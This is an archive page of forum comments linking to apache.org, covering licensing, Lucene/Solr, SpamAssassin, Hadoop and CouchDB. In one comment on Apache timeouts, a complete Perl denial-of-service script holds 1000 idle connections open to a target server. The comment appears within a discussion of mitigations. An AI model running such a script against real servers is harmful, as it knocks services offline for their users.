Domain: apache.org
Stories and comments across the archive that link to apache.org.
Comments · 2,937
-
Re:Apache v2.0
You absolutely can use that in commercial products. You can also create derivative works and not release the source.
Apache 2.0 is considered a "commerce friendly" open source license (whatever that means). You'll see it in commercial products like Android and the Apache web server.
-
Re:don't hate PDF 'cause it's beautiful
It's easy to generate beautiful PDFs from well-structured data but it's much harder to go the other way. Would you rather have budget figures (for example) as a CSV file in a well-defined format or as a PDF of tables and graphs?
More importantly, it's then easy to import that data for visualization and analysis purposes. Data presented as a PDF file is effectively so inaccessible that it will rarely be extracted for further analysis, meaning that some gov't functionary becomes responsible for the presentation and analysis instead of members of the public. Then a panoply of tools become available for finding out things from that data that no one ever knew were there. Something like Tableau Desktop can slurp in CSV data (or data imported to a slew of OSS or commercial DBs) and allow very rapid exploration.
As an aside, I will point out that CSV is an _evil_ format. Did you know it can be generated in localized forms (without any distinguishing metadata), which means the comma may be repurposed as a thousands separator instead of a field delimiter? Oops. Really, what idiot thought it was a good idea to have a localized data format... Much better to use a serialization format like Avro, which uses a compact serialization for tabular data (akin to Protocol Buffers or Thrift) and keeps the schema data (i.e. the description of the table's structure: columns, types, etc.) as a sidecar file in JSON.
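To make the localization hazard concrete, here is a minimal Python sketch. The sample row and the two delimiter guesses are made up for illustration; the point is only that the same bytes parse differently depending on an assumption the file never records.

```python
import csv
import io

# Hypothetical export from a locale that uses ';' as the field delimiter
# and ',' as the thousands separator. Nothing in the file says so.
raw = "department;budget\nroads;1,234\n"


def parse(text, delimiter):
    """Parse CSV text with the given delimiter and return all rows."""
    return list(csv.reader(io.StringIO(text), delimiter=delimiter))


as_semicolon = parse(raw, ";")  # what the producer meant
as_comma = parse(raw, ",")      # what a default reader assumes

print(as_semicolon[1])
print(as_comma[1])
```

Read with the wrong delimiter, the budget figure is silently split across two fields, and no error is raised.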
-
Re:What are the odds?
Well, not exactly true, since SA supports all sorts of plug-ins that can catch this type of spam, as well as generic spam, such as Cloudmark plugins and various blackhole lists.
The test list http://spamassassin.apache.org/tests_3_2_x.html shows many that might be useful for this.
-
Re:IBM OmniFind
nothing but a packaged version of Apache Lucene.
Ahh... no... OmniFind Enterprise Edition (the version you pay for) is NOT based on Lucene. So, maybe you should keep your mouth shut if you don't know what you are talking about.
To the OP, if you want an enterprise class secure search engine that will search across
- filesystems
- websites
- nntp server
- Content repositories like FileNet, Documentum, Stellant, Quickr, Sharepoint
- Portal servers
- UIMA plugins
- Messaging servers (Exchange & Domino/Notes)
- and APIs for you to crawl any third party system (SAP, Siebel, anything etc)
then OmniFind Enterprise Edition is the way to go. And IBM has a half price starter edition for smaller implementations.
-
version control system + build/deploy engine
We do this for many many Drupal sites on many horizontal web nodes via bzr + ant. By 'sites' I mean no multi-site; each 'site' gets its own Drupal instance. By 'Drupal instance', I mean the 'Drupal instance' is an ant-powered deploy from a branch in bzr comprised of vendor branches (core + modules) merged in plus customizations by our shop. Each environment gets a branch, and we merge code upstream (dev -> tst -> prd).
The only thing 'shared' across the infrastructure is the web services and frameworks on the webapp nodes. Ant is great at auto-magic MySQL db provisioning, Drush calls to pound the schema, APC cache flushes, Memcached bops, etc. Also I would throw myself off a bridge if I had to manage all the complex merges across our branches and dealing with updating the vendor branches.
Others here also made the comment wrt code up, content down. Live it, love it; SERIOUSLY! Refresh often, and give your devs anonymized slices of the db for them to keep on a laptop they will undoubtedly leave in a cab. We're currently bending ant to perform the downstream refreshes + sanitizes. Looks very promising.
Also if you're not able to bastardize ant to do what you want it to do, look at ant-contrib to further extend the tool.
http://bazaar-vcs.org/en/
http://ant.apache.org/
http://ant-contrib.sourceforge.net/
Slightly OT: The J2EE guys at $employer prefer a maven+ant+svn approach. YMMV.
Have fun. These are very interesting toys to play with, tbh.
-
IBM OmniFind
If you're able to get a hold of it, IBM OmniFind Yahoo Edition would do the trick. Unfortunately Yahoo pulled the plug when they went into bed with Microsoft (Bing). I'm using it on a local intranet, and it works great. If you have a deep wallet, you can always look into the commercial version IBM offers, but it is really nothing but a packaged version of Apache Lucene.
-
Re:NO! Try Alfresco
You could use Microsoft Enterprise Search Server Express which is free (if you have a Windows Server license laying around). It's the same search engine as MOSS without the CMS functionality and it can crawl just about everything either natively or with connectors. You can use MSSQL Express as the database engine which is also free.
Or you could go completely open source with Apache Solr, though I hear it's so featureful that it's very difficult to install and configure.
-
Lucene is a great foundation for this
So I think I'd start by looking here.
-
Enterprise Content Management with Alfresco
Yes, Google's Search Appliance (GSA) could be used, I have seen it used with limited success. The main problem was how to respect access control on documents: either you index them or you don't, and if you index them with GSA, sensitive data may show up in search results. Also, we had a lot of trouble "taming" GSA: it would regularly take down servers that were dimensioned for light loads.
I would suggest using Alfresco http://www.alfresco.com/ as a CIFS (Common Internet File System) or WebDav store for all those documents. This would give you the simplicity of a shared folder and the opportunity to enrich the documents with searchable metadata such as tags, etc. Each folder (or any item, in fact) could have the correct access control that would be respected by the search engine, Lucene. http://lucene.apache.org/java/docs/
Alfresco comes in both Enterprise and Community Editions, and it's very easy to try out -- even our non-techie project manager could install it on his PC within 10 minutes. Try that with Documentum, FileNet or IBM DB2 Content Manager!
-
Re:The web server can finally serve large files
When I looked at the release notes sent out by email, I saw this under "New functionality":
"httpd(8) can now serve files larger than 2GB in size."
I'm very surprised by this. Apache has been able to do that since 2.2. Of course, a web page larger than 2 gigs is a bug, not a feature...
http://httpd.apache.org/docs/2.2/new_features_2_2.html
Large File Support
httpd is now built with support for files larger than 2GB on modern 32-bit Unix systems. Support for handling >2GB request bodies has also been added.
-
Re:Cause and Effect
Maybe the way it was written is why FOSS is where it's at? Might not be such a bad idea to keep it around?
Then again, maybe the GPL is not responsible for great free software and open source software being written.
Don't get me wrong, I think developers should be allowed to pick their license of choice, including GPL. But there are plenty of examples of free software and open source software being highly successful and widely used that are not GPL'd.
The assumption that the GPL is responsible for the success of FOSS reminds me of a Simpsons episode where Homer is carrying a rock around that supposedly repels lions (or something). Lisa says, "That's ridiculous! What makes you think that repels lions?" and Homer replies, "You don't see any lions around, do you?"
I believe that the publicity surrounding GPL and the way it forces developers who use code licensed under it was a major factor in the expansion and acceptance of open source software. That doesn't mean that those other licenses aren't just as valuable to the ongoing health of and expansion of open source software. It just means that GPL created the mindspace to allow non-geeks to view open source as something more than a fringe element.
-
Re:Cause and Effect
Maybe the way it was written is why FOSS is where it's at? Might not be such a bad idea to keep it around?
Then again, maybe the GPL is not responsible for great free software and open source software being written.
Don't get me wrong, I think developers should be allowed to pick their license of choice, including GPL. But there are plenty of examples of free software and open source software being highly successful and widely used that are not GPL'd.
The assumption that the GPL is responsible for the success of FOSS reminds me of a Simpsons episode where Homer is carrying a rock around that supposedly repels lions (or something). Lisa says, "That's ridiculous! What makes you think that repels lions?" and Homer replies, "You don't see any lions around, do you?"
-
Re:Data management problem
I'm bad at explaining stuff like this, so: http://wiki.apache.org/hadoop/Hbase/FAQ#A20
-
two great portable runtime libraries
-
Re:Apache Portable Runtime
-
many choices
-
Re:This article oversimplifies a complex problem
Is the open source solution close enough to the needs of the Ontario government that, as the article alleges, all you need to do is buy some servers and set it up and there are negligible other costs? I seriously doubt it. I would be willing to bet heavily against it. Anyone who thinks otherwise probably hasn't spent much time developing software for government.
I haven't, no...but what are said needs?
I'm assuming that the main component of a record system is going to be a database. You'll also need a usable system and interface for entering and retrieving said records into the DB. You're also going to want to do SQL dumps and periodic offsite backups, so that if anything goes wrong, you can get the data back.
Of course, it will also be very important to ensure that the operating system the database is hosted on, is as robust as possible, to minimise the possibility of crashes; as well as a strong filesystem for times when you need to make a lot of queries at once. Even though that system is meant for servers, you can still make it user friendly for your administrative staff as well, if you need to.
If you're going to want the records accessible from outside the hospital, you'll probably also want to make sure that they are protected by a couple of very secure firewalls, as well, since it could potentially mean the loss of someone's life if they get cracked.
Finally, they will need to make sure that whoever puts the network together does so according to sound administration principles, as well.
-
So who cares about the CLR/Mono anyways?
So I'm going to trot out a different perspective; enough others will thrash through the personalities under discussion here. In my view, Mono is essentially irrelevant. Some folks will use it to bridge apps around platforms, instead of Qt or a handful of other approaches. Yawn. Internally, Microsoft has done some pretty neat things with their various implementations of the CLR (the VM underlying C#). This is unsurprising, as they're well capable of hiring some pretty bright folks. But I doubt that any of that will ever really inform the broader computing community.
In contrast, the JVM seems to be undergoing a renaissance. There's tons of programming language work on the JVM these days: Scala, JRuby, Clojure, Jython, etc. Each of these is bringing its own community and problem domain to the JVM, and has already broken new ground in language implementation and design. As for new frameworks, there's scalable computing work going on under the Hadoop project (Google filesystem, Bigtable, and map-reduce for-the-rest-of-us) and the really interesting related framework Cascading. With the JVM as an interoperability platform, these languages and various new frameworks all get to be combined together in fascinating new ways.
-
Re:Until they hit the jackpot
-
sharepoint is another failure
Slashdot is just doing its part to publish astroturfing. MS Sharepoint is a failure wherever it is deployed. Here are the CRM packages MS is trying to outshout:
-
Re:Any verification on the Apache web server?
-
CouchDB
Check out CouchDB. It is built around the concepts of distributed (and even offline) databases and handles conflict resolution. It employs optimistic locking.
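For anyone unfamiliar with optimistic locking, here is a toy Python sketch of the idea. It is an in-memory model, not CouchDB's API: the `TinyStore` class, the integer revisions and the `Conflict` exception are all invented for illustration. The principle is the same, though: a write must name the revision it was based on, and it is rejected if someone else got there first.

```python
class Conflict(Exception):
    """Raised when a write is based on a stale revision."""


class TinyStore:
    """Toy in-memory document store (hypothetical, not CouchDB's API)."""

    def __init__(self):
        self._docs = {}  # doc_id -> (revision number, body)

    def get(self, doc_id):
        """Return (revision, body) for a stored document."""
        return self._docs[doc_id]

    def put(self, doc_id, body, expected_rev=None):
        """Store body if expected_rev matches the current revision."""
        current = self._docs.get(doc_id)
        current_rev = current[0] if current else None
        if current_rev != expected_rev:
            # Nobody was ever locked out; the late writer simply loses
            # and has to re-read, merge, and retry.
            raise Conflict(
                f"{doc_id}: expected rev {expected_rev}, found {current_rev}"
            )
        new_rev = (current_rev or 0) + 1
        self._docs[doc_id] = (new_rev, body)
        return new_rev


store = TinyStore()
rev = store.put("note", {"text": "first draft"})
rev = store.put("note", {"text": "second draft"}, expected_rev=rev)
try:
    store.put("note", {"text": "stale edit"}, expected_rev=1)
except Conflict as err:
    print("rejected:", err)
```

No lock is held between the read and the write, which is what makes the approach workable for disconnected or replicated copies.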
-
Re:So it looks like these are for "cloud computing
If you want to be buzz-word compliant, then yes, kind of.
More to the point, GFS and HDFS are distributed file-systems that are designed to run on potentially very large clusters of commodity hardware. The potential applications are quite diverse. Hadoop itself involves more than just the file-system, but HDFS is really at the core of any application you would want to build with it. This list gives you a good idea of who uses Hadoop and for what purpose.
-
Why use a language-dependent MOM?
I'm bewildered why "plain old Java objects" is considered a virtue, considering it still makes the middleware language-specific for something that is essentially an integration software. If all you do is Java, fine. But gambling that you'll always be married to one language seems like you're giving up too much for no gain. Perhaps developers should take a closer look at something like Advanced Message Queuing Protocol (AMQP) and implementations like RabbitMQ or Apache ActiveMQ?
-
Other approaches to scalable SQL
There are also two Hadoop subprojects that either support SQL or will shortly. They both translate SQL queries into map/reduce programs. They are:
-
Perhaps the contractors could...
... find a way to contribute some small portion of their profits to The Apache Software Foundation?
Or any number of PHP- and Linux-related organizations?
Or Drupal?
That just seems to be the right thing to do, is all.
-
This is a Good Thing
The site is running Apache on Red Hat Enterprise Linux 5, and it looks like Drupal running on PHP. What more do you want?
-
Re:Remote X servers?
-
Just show up and start helping out
You don't need to ask anyone's permission, just show up and start helping out. If you check out the source code to the Apache HTTP Server (find out how at http://httpd.apache.org/dev/devnotes.html), you'll find 50 instances of the word "FIXME" in the source code (case insensitive search). Check out what the original author thought still needs fixing, and post a patch to dev@httpd.apache.org. Alternatively, you can look in the bug database and start picking low hanging fruit. Again, no permission needed. If your patches are good, they'll get committed. If they aren't, we'll tell you how you can improve.
You will find that every project has its own coding conventions, macros, libraries and idiosyncrasies. Real code will look very different from the examples and exercises you have worked with so far. You'll have to learn the particulars and become comfortable with each project you take on. This is a tedious and uncomfortable process, but it does tend to pay off.
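If you want to reproduce that case-insensitive FIXME search on your own checkout, a small Python sketch along these lines would do. The function name and the choice of `.c` and `.h` files are assumptions for illustration, and the count you get will depend on which version of the source you have.

```python
import os
import re

FIXME = re.compile(r"fixme", re.IGNORECASE)


def count_fixmes(root, extensions=(".c", ".h")):
    """Return {path: count} for source files under root mentioning FIXME."""
    hits = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            # Old source trees are not always valid UTF-8, so replace
            # undecodable bytes instead of failing on them.
            with open(path, encoding="utf-8", errors="replace") as handle:
                count = len(FIXME.findall(handle.read()))
            if count:
                hits[path] = count
    return hits
```

Calling `count_fixmes("path/to/checkout")` and sorting the result by count gives a rough list of files worth reading first.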
-
Re:Argument moot, just use both
That's an excellent client-side solution.
In the interest of asking, though, what about a server-side solution? One could use HTTP Accept headers and content negotiation in the HTTP server, if you'll excuse the slight dip in performance. For example:
- Browser requests /path/to/video.
- The browser sends the Accept header (or X-HTML5-Video-Accept header, if you want it that way), which contains video/mp4;q=0.9, video/ogg;q=0.8.
- The server sends /path/to/video.mp4.
Likewise:
- Browser requests /path/to/video.
- The browser sends the Accept header (or X-HTML5-Video-Accept header, if you want it that way), which contains video/ogg,*;q=0.1.
- The server sends /path/to/video.ogg.
Something like that, at least. In fact, were browsers to add video MIME types to their Accept headers, one could implement this yesterday. This solves the issue of codecs, as long as content providers make it available in as many formats as possible.
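The server-side half of that exchange could be sketched roughly as follows. This is a simplified Python illustration, not how any particular HTTP server implements negotiation: the function names are made up, the bare `*` wildcard is accepted only because the example above uses it, and the specificity rules of real Accept handling are ignored.

```python
def parse_accept(header):
    """Parse an Accept header into a list of (media_type, q) pairs."""
    prefs = []
    for part in header.split(","):
        fields = [field.strip() for field in part.split(";")]
        media_type = fields[0]
        if not media_type:
            continue
        q = 1.0  # a media range without a q parameter counts as q=1
        for param in fields[1:]:
            name, _, value = param.partition("=")
            if name.strip() == "q":
                try:
                    q = float(value)
                except ValueError:
                    q = 0.0
        prefs.append((media_type, q))
    return prefs


def matches(media_range, candidate):
    """True if a media range from the header covers the candidate type."""
    if media_range in ("*", "*/*", candidate):
        return True
    # "video/*" covers every candidate starting with "video/".
    return media_range.endswith("/*") and candidate.startswith(media_range[:-1])


def choose_variant(header, available):
    """Pick the available media type the client prefers most, or None."""
    best_type, best_q = None, 0.0
    for media_range, q in parse_accept(header):
        for candidate in available:
            if matches(media_range, candidate) and q > best_q:
                best_type, best_q = candidate, q
    return best_type


variants = {"video/mp4": "/path/to/video.mp4", "video/ogg": "/path/to/video.ogg"}
chosen = choose_variant("video/mp4;q=0.9, video/ogg;q=0.8", variants)
print(variants[chosen])
```

When `choose_variant` returns None the server has nothing acceptable to offer, which is the case a 406 response exists for.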
-
Re:k
Really? Am I the only person that found it interesting that Lucene, the only non C/C++ implementation, gave some pretty impressive stats? I mean, it's written in Java and although it has a slower index time its search time, index size and relevancy are impressive.
Lucene is a great search tool. As TFA pointed out, however, if you're looking for a "search solution" rather than "search engine" then you should check out Solr instead. Lucene is a toolkit that you build on top of, not something you really want to deploy by itself. Solr is that thing built on top of Lucene.
Be aware that while Lucene/Solr has made terrific progress, it is not quite in the "enterprise search" category. For superscale implementations you'll still likely need to look at a high-priced product like FAST.
-
You are reinventing DocBook
You are trying to reinvent DocBook. Not only is everything you want done, it is implemented in several tools (XMLMind and oXygen are two I know of), has a standard method of converting it to any form you want (XSL, XSLT, XSL-FO), and there are tools that are already written to take advantage of those standards (Apache FOP being a FLOSS one). The latest version of DocBook uses XML namespaces, so you can mix in other markup languages as well; the canonical example is DocBook + MathML + SVG, which covers 99.9% of the math/science based literature out there. BTW, if you DO plan on going down this path, I suggest picking up a copy of XSLT, 2nd edition by Doug Tidwell. The latest version of the DocBook book is supposed to be out in August; don't buy the version currently on sale, it is 10 years old, and does NOT cover the current version of DocBook.
-
XML/XSL/FOP/PDF
-
Re:(of course, I may have mis-read you)
I'm hardly an idiot. If I could find an open source software package capable of doing what I require, I would have gone that way a long time ago. As it stands, I have to use a proprietary software package that does not allow me to weight the incoming emails based on *any* RBL's. I can only refuse the connection based on the RBL's.
You're kidding right? What (where) is your skill set? Build a Linux or FreeBSD smart host box with Postfix and SpamAssassin. Then relay the scrubbed mail stream to your current mail server. You can block outright based on dnsbl hits within Postfix, or you can score based on dnsbl hits in SpamAssassin.
Here's a decent head start:
http://www.debian.org/
http://wiki.debian.org/Postfix
http://www.debianhelp.co.uk/spam.htm
http://wiki.apache.org/spamassassin/DnsBlocklists
If you're currently running Exchange, all you have to do is tell Postfix to relay all inbound mail to the IP address of your Exch server. For example, in main.cf you'd have:
relayhost = 10.3.2.1
To get Postfix to accept mail for your users, you can either have Postfix poll your AD server for valid user addresses, or you can just manually type them into a relay_recipients file, if you're a small organization, say 100 users or less. The manual thing gets really tedious for larger user counts.
It's a fantastic anti spam solution. If you're not a sysadmin type and don't know anything about dns and changing MX IPs in your dns server or getting your provider to do it, you may not want to take this plunge. You've got to have some decent networking background, including configuring dns entries on your authoritative server.
-
Re:Why Do They Ignore Their Own Advice?
What you really need is a system to 'compile' the source pages to something less readable, but significantly smaller - removing comments, replacing the unneeded end tags, shortening the variable names. If that was automated...
Something like gzip compression perhaps?
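A quick way to see how much plain gzip already buys you is to compress a page yourself. The snippet below is a Python sketch with a made-up, deliberately repetitive page, so the ratio it prints flatters real-world HTML; treat it as a demonstration of the mechanism, not a benchmark.

```python
import gzip

# Hypothetical page: repetitive markup with comments, like a lot of HTML.
page = (
    "<!-- navigation row -->\n"
    '<tr><td class="item">entry</td></tr>\n'
) * 200

raw = page.encode("utf-8")
packed = gzip.compress(raw)

print(f"{len(raw)} bytes raw, {len(packed)} bytes gzipped")
```

Comments and long closing tags are exactly the sort of repetition the compressor removes, and the source stays readable.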
-
Re:*snort*
>I would love to find a proprietary product out there that uses the RBL's like that and also provides the features I am looking for.
http://spamassassin.apache.org/
Why does the solution have to be proprietary? SA works great. Out of thousands of spams that come into my account per day, maybe only 1 or 2 make it through, and there are almost no false positives lately.
-
Re:Dropbox
If you could explain how to set up what you described, I am sure I am not the only one who would be interested.
- Install your favorite Linux distribution on spare hardware.
- Install the Apache HTTP server from the distribution, and start the service.
- Test Apache from another computer on your LAN.
- Configure your firewall to forward a port to port 80 on the Linux machine.
- Copy files to the Linux directory served by Apache.
- Profit!!
Seriously, though, at this point, you need to add some sort of security, and would probably want to set up virtual directories so that you don't have to place all the files under /var/www/html (the default location served by Apache). The default Apache config file (/etc/httpd/conf/httpd.conf) is heavily commented so as to be self-documenting for most tasks, although using SSL is not one of them. But, for the heavy lifting, the Apache docs will cover everything. You'll also almost certainly want to set up some sort of dynamic DNS as the poster above describes.
I'm sure most people here will call me nasty names because of it, but I also use IIS to serve some of my sites.
-
Re:Not a flaw, easily configured around
The work-around works fine.
I downloaded Slowloris and was able to take down a default Apache install; however, with keepalive disabled and a timeout of 5, the attack became ineffective.
This may be a problem for sites with users that do long-running POSTs, but since we don't have any of those, all I can say is "It works here . . . "
For more info: http://httpd.apache.org/docs/trunk/misc/security_tips.html
-
HTTP hints at a solution
HTTP 1.1 specifies a status code for "Request Timeout" (408) and "Gateway Timeout" (504).
What is needed, therefore, is a timer running for receiving the complete header, and a second one for accepting the body. The timer for the body can be controlled by the type of request and the Content-Length header. (With, of course, a specific cap.)
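As a rough illustration of the two-timer idea, here is a Python sketch. Everything in it is an assumption: the function names, the 10-second header limit, the minimum transfer rate and the cap are invented numbers, and this is not how Apache or any other server actually implements its timeouts.

```python
def body_deadline(content_length, min_bytes_per_sec=1024,
                  floor_secs=5.0, cap_secs=300.0):
    """Seconds allowed for receiving a request body of the given size.

    The allowance grows with Content-Length but never exceeds cap_secs,
    so a client cannot buy unlimited time by announcing a huge body.
    """
    if content_length <= 0:
        return floor_secs
    wanted = content_length / min_bytes_per_sec
    return max(floor_secs, min(wanted, cap_secs))


def timeout_status(elapsed, header_done, header_secs=10.0, body_secs=None):
    """Return 408 if the timer for the current phase has expired, else None."""
    limit = body_secs if header_done else header_secs
    if limit is not None and elapsed > limit:
        return 408  # Request Timeout
    return None


# A 60 KiB upload gets 60 seconds; a claimed 1 GB upload is capped.
print(body_deadline(60 * 1024), body_deadline(10**9))
```

The header timer runs from the moment the connection is accepted, so a client that connects and sends nothing is cut off as well.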
Currently, Apache 2.2 has a single timeout value for all types of requests, but it is interpreted differently for the different types.
If your server only handles GETs, the obvious thing is to crank that number down. Unfortunately, for PUTs, the TimeOut value affects inter-packet time in the request, not overall request time.
Strangely, the timeout doesn't seem to run in 2.2.10 and 2.2.11 before data is received. Oh dear. That's an even simpler DoS.
#!/usr/bin/env perl
use IO::Socket::INET;
use strict;
use constant DEFAULT_PORT => "http";
MAIN: {
    if(@ARGV<1 or @ARGV>2) {
        die "Usage: $0 host [port]\n";
    }
    my($host)=shift;
    my($port)=@ARGV?shift:DEFAULT_PORT;
    my(@sockets);
    for(my $cnt=0;$cnt<1000;++$cnt) {
        my $socket=new IO::Socket::INET(PeerAddr=>$host,
                                        PeerPort=>$port,
                                        Proto=>"tcp");
        unless(defined($socket)) {
            die "Cannot create socket to $host:$port--$!\n";
        }
        $socket->print("\r\n");
        push(@sockets,$socket);
        print " Have ".@sockets." open.\n";
    }
}
Not quite as stealthy, though. At least as above.
-
The power behind CouchDB
I notice that CouchDB makes a big deal of its Erlang based core -- essentially "this part is trustworthy and parallelises well because it's in Erlang".
I also notice Joe Armstrong (or more likely a transcriber) is as bad at spelling "lose" as the rest of the internet...
-
Re:Document management software
The problem with document management software is that it requires users to do some "extra" work filling in metadata. This fails. Generally users will not fill in more than a title; adding keywords, short descriptions, or file numbers is simply too much effort. When the metadata fails, the document management system also fails.
I suggest you first look at getting a good enterprise search engine. Lucene (apache.org) is open source and free; MindServer (www.recommind.com) from Recommind is not, but is amazing (I'm a happy client, not a shill).
If your users can find everything they need to do their work, who cares how badly it is sorted or filed.
-
Re:Even a stopped clock can tell the right time
You seem to imply that Android is closed source? It's not.
The hardest part of the search technology, the processing of massive amounts of data and the indexing of that was open sourced as well.
I think it's fair to say that Microsoft is anti-open source and Google pro-open source. Actions speak louder than words, especially words coming from Microsoft I might add.
-
Re:FreeIPA, Apple OD, Gosa2, Novell eDirectory, FD
There is also:
Apache Directory
Sun OpenDS
-
Re:all-your-code-is-ours
I agree with your opinion about not signing an agreement like this, but I believe the blog post is referring to something slightly different. Many open source projects require contributors to sign an agreement that basically says that the code you are contributing does not have existing copyright restrictions. This is a little different from the employer/employee contracts that say all your code/work/ideas/children created during employment belong to the company. The contributor license at Apache, for example, I think is more aimed at preventing them from being sued in case someone uploads all their company's proprietary code to an open source project.
-
Re:We need to take care of our privacy.
NoScript is completely ineffectual against even passably mediocre tracking technologies. I mean, I can think of at least a couple of ways to bypass NoScript without breaking a mental sweat.
Let's see...
Request comes to web server. Web server gets IP address, referrer (or referer if you're the W3C). That immediately goes into a database, along with a unique GUID that then gets appended as a variable to every link on my page. This can either be done GET-style as a URL parameter...
http://slashdot.org/~Civil_Disobedient/?12345
...or, I can just put it as part of the actual link, like this:
http://slashdot.org/12345/~Civil_Disobedient/
...and then mod_rewrite it to the first form. Or I could do this just as easily:
http://slashdot.org/12345~Civil_Disobedient/
There's really nothing that can be done to stop it, but this shouldn't make you any more paranoid than saying there's nothing you can do to stop store owners from memorizing faces and purchases.
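To show how little machinery the link-tagging takes, here is a Python sketch of the first two URL forms above. The function names are invented for illustration, and a real site would do this in its templating layer or with a rewrite rule; none of it needs any script to run in the browser, which is the point.

```python
from urllib.parse import urlsplit, urlunsplit


def tag_query(url, token):
    """Append the token as a bare query string: /page/?12345"""
    parts = urlsplit(url)
    query = f"{parts.query}&{token}" if parts.query else token
    return urlunsplit(parts._replace(query=query))


def tag_path(url, token):
    """Insert the token as the first path segment: /12345/page/"""
    parts = urlsplit(url)
    return urlunsplit(parts._replace(path=f"/{token}{parts.path}"))


link = "http://slashdot.org/~Civil_Disobedient/"
print(tag_query(link, "12345"))
print(tag_path(link, "12345"))
```

Every link on the page is rewritten once, on the server, before the page is sent.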
-
COBOL
New alternatives are popping up constantly but I'm going to go out on a limb and say that SQL is going to be around for a long time.
That's pretty much guaranteed. COBOL is still around.
There absolutely are better alternatives, for almost every situation. No one in their right mind starts a new system in COBOL, when they have a choice.
Yet COBOL is still around, and will be still around for awhile. So will SQL.
The only question is whether SQL will be like COBOL or like C. I could make a similar case for C being obsolete, and there are certainly many cases where a performance penalty is well worth it to get some other desired feature -- for instance, there are things I can imagine doing in Erlang that I'd never attempt in C. But people do anyway, and even modern high level languages seem to start as interpreters written in C.
Personally, I'd rather see CouchDB mature, and see SQL become more like COBOL, but that doesn't seem likely to happen soon.
-
Re:"The non-open and proprietary..." blah blah
We're using Batik and it's great. It's real, working, (mostly) complete, and multi-platform. Does it cover absolutely everything? No, it doesn't (see their status page), but it has done everything that we want it to do.